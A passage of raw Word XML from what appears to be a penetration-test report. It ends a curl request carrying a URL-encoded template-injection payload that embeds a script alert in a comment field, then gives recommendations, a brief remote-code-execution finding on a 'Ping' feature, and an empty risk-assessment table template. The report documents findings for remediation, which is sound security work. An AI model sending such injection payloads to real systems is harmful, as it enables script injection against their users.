        <w:t>" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2202C14D" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "Origin: http://13.41.78.176" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE7D83" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "Proxy-Connection: keep-alive" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE202ED" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: http://13.41.78.176/watcher" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15970D00" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "Upgrade-Insecure-Requests: 1" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA76BD" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0A2445" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  --data-raw "comment=^%^7B^%^7Bdefine+^%^22T1^%^22^%^7D^%^7D^%^3Cscript^%^3Ealert^%^281^%^29^%^3C^%^2Fscript^%^3E^%^7B^%^7Bend^%^7D^%^7D+^%^7B^%^7Btemplate+^%^22T1^%^22^%^7D^%^7D" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E75AF" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  --compressed ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520C1FA" w14:textId="399595EA" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  --insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB8901" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF"/>
    <w:p w14:paraId="2A196B13" w14:textId="1E085E61" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">Result - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211A62A2" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00C71329">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A2FE07A" wp14:editId="5C6C365F">
            <wp:extent cx="5486400" cy="2898775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="357998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8107" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2898775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB47E27" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00C71329"/>
    <w:p w14:paraId="1E5E38C4" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB47A44" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement strict input validation to prevent the injection of template-specific commands or syntax within user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C34BFB" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apply output encoding or escaping techniques to neutralize template-specific commands before rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446CEC1" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conduct thorough security reviews of template implementations and enforce secure coding practices for template rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E87D62" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00C71329"/>
    <w:p w14:paraId="2DF68061" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00C71329"/>
    <w:p w14:paraId="1C6E7A15" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA24AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA24AF">
        <w:t>Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2DDFA5" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t>Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E99237" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">CVSS 3.1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Score</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 9.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48867311" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">Scoring Vector: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3846DAE3" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF"/>
    <w:p w14:paraId="140B18FF" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF"/>
    <w:p w14:paraId="03A2CFE5" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t>The application is susceptible to Remote Code Execution (RCE) due to inadequate input validation in the "Ping" functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739FF69E" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF"/>
    <w:p w14:paraId="553B1A9B" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF"/>
    <w:p w14:paraId="24E7843B" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>It is mentioned above also.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14E398" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00E10C31" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0737FCA1" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF"/>
    <w:p w14:paraId="68C3DB47" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0341F" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement stringent input validation and proper command sanitization techniques to prevent the execution of arbitrary commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C505F" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilize secure coding practices, avoid direct system calls, and apply proper access controls to mitigate RCE vulnerabilities effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC40E72" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Regularly update and patch the software to eliminate known vulnerabilities that could lead to RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C37D1E" w14:textId="6684D872" w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:sectPr w:rsidR="00EA24AF" w:rsidRPr="00EA24AF" w:rsidSect="00423308">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:noEndnote/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A39CCD" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC32117" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc155811470"/>
      <w:r>
        <w:t>5.  Risk Assessment Results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D9472C" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[List the observations (vulnerability/threat-source pairs). Each observation should include—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C3855" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t>Observation number and brief description of observation (e.g., Observation 1: User system passwords can be guessed or cracked)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7959C415" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t>A discussion of the threat-source and vulnerability pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4441B" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t>Identification of existing mitigating security controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7577A2" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t>Likelihood discussion and evaluation (e.g., High, Medium, or Low likelihood)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047B41B2" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t>Impact analysis discussion and evaluation (e.g., High, Medium, or Low impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0793F3DA" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t>Risk rating based on the risk-level matrix (e.g., High, Medium, or Low risk level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FEAFC9" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t>Recommended controls or alternative options for reducing the risk].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA97B3" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13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008"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="1442"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="1080"/>
        <w:gridCol w:w="928"/>
        <w:gridCol w:w="2960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED747A" w14:paraId="07A96B0C" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="558A7429" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Item Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B972355" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2158" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="303356EF" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Threat-Source/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9AED9C" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E9A4AE6" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Existing controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="20380923" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="20C3444E" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="928" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7E202DD6" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2960" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="338B7237" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="259B4F26" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="097C4E48" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D3C600" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2158" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="575F970F" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="093308F9" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05EBF454" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4808F303" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A5F9248" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
